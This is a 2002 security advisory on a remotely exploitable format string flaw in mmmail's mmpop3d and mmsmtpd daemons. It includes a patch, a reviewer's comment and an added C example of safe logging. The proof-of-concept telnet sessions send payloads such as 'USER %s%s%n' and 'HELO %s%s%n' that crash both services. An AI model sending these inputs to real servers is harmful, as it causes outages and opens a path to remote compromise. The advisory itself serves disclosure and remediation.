14th Jun 2002 [SBWID-5437]
COMMAND
mmmail POP3-SMTP daemon format string vulnerability
SYSTEMS AFFECTED
mmmail <= 0.0.13 (mmpop3d & mmsmtpd)
PROBLEM
Guillaume Pelat [http://www.intexxia.com], in INTEXXIA security
advisory #1054-040602, found the following:
"mmmail provides SMTP and POP3 daemons using MySQL, running as a non-root
user. It also supports bandwidth shaping. Relaying is not supported, although
it has been designed to handle many users on many virtual hosts. It is
fast and secure, uses threads, and has been written entirely from
scratch and does not rely on mbox or Maildir formats."
mmmail includes 2 daemons, mmpop3d and mmsmtpd. Both are vulnerable
to a remotely exploitable format string issue.
There is a format string vulnerability in the 'mmsyslog()' function
of the 'mmpop3d' and 'mmsmtpd' programs. This function acts like
'vsyslog()' if '__GLIBC__' is defined. It calls the 'syslog(3)'
function with a format string that can be defined by a remote user. It
is not necessary to authenticate to exploit this vulnerability.
Successful exploitation of this flaw can allow a remote user to obtain
a local account on the target machine.
PROOF OF CONCEPT
================
mmpop3d
--------
test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
+OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
USER %p%p
-ERR Invalid username
In the log file :
mmpop3d[2165]: 3CFC8B53 USER 0x8052f620x80a44fc
test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
+OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
USER %s%s%n
Connection closed by foreign host.
test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused
mmsmtpd
-------
test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
HELO %p%p
501 Invalid hostname
In the log file :
mmsmtpd[2188]: 3CFC8BF9 HELO 0x8052e360x80a447c
test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
HELO %s%s%n
Connection closed by foreign host.
test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused
SOLUTION
The following patch corrects this issue:
diff -dru mmmail-0.0.13/mmlib/mmlog.c mmmail-0.0.13.fixed/mmlib/mmlog.c
- --- mmmail-0.0.13/mmlib/mmlog.c Mon May 13 08:20:13 2002
+++ mmmail-0.0.13.fixed/mmlib/mmlog.c Tue Jun 4 12:37:19 2002
@@ -70,7 +70,7 @@
va_start(lst, fmt);
vsnprintf(buf, 1023, fmt, lst);
va_end(lst);
- - syslog(LOG_NOTICE, buf);
+ syslog(LOG_NOTICE, \"%s\", buf);
}
}
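Review bot: the constant format on the `+` line closes the second formatting pass, but the `vsnprintf(buf, 1023, fmt, lst)` context line above it still trusts `fmt`, so every caller of this function has to pass a literal format with client data only as arguments; declaring the function with a printf format attribute would let the compiler check that. The 1023 literal would also be safer as a size derived from `buf` itself (its declaration is outside this hunk), and since the advisory says this path is taken when `__GLIBC__` is defined, the other branch deserves the same audit for a non-constant format.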
A new version including this patch is available at the following URL:
http://mmondor.gobot.ca/software/linux/mmmail-0.0.14.tar.gz
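The two-pass logging pattern described above, with the corrected second pass, as an added example that is not mmmail's own code. The names safe_log, log_sink, last_logged and log_client_command are hypothetical, and log_sink stands in for syslog(3) so the logged text can be inspected.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Hypothetical capture buffer: the last message handed to the log sink. */
static char last_logged[1024];

/* Stand-in for syslog(3) with the same printf-style contract (assumption:
 * used instead of the real call so the logged text can be inspected). */
static void log_sink(int prio, const char *fmt, ...)
    __attribute__((format(printf, 2, 3)));
static void log_sink(int prio, const char *fmt, ...)
{
    va_list ap;
    (void)prio;
    va_start(ap, fmt);
    vsnprintf(last_logged, sizeof last_logged, fmt, ap);
    va_end(ap);
}

/* Patched shape: the first pass expands the caller's format, the second pass
 * treats the result as data. The attribute makes gcc/clang check call sites. */
static void safe_log(const char *fmt, ...)
    __attribute__((format(printf, 1, 2)));
static void safe_log(const char *fmt, ...)
{
    char buf[1024];
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(buf, sizeof buf, fmt, ap);   /* truncates, always NUL-terminated */
    va_end(ap);
    log_sink(LOG_NOTICE, "%s", buf);       /* never log_sink(LOG_NOTICE, buf) */
}

/* Logs a client verb and its argument (simplified form of the USER/HELO
 * log lines shown above) and returns the text that reached the sink. */
const char *log_client_command(const char *verb, const char *arg)
{
    safe_log("%s %s", verb, arg);
    return last_logged;
}

int main(void)
{
    puts(log_client_command("USER", "%p%p"));     /* constructed input */
    puts(log_client_command("HELO", "%s%s%n"));   /* constructed input */
    return 0;
}
```

With the constant "%s" format, the conversion specifiers sent by the client reach the log verbatim instead of being expanded as they are in the log excerpts above.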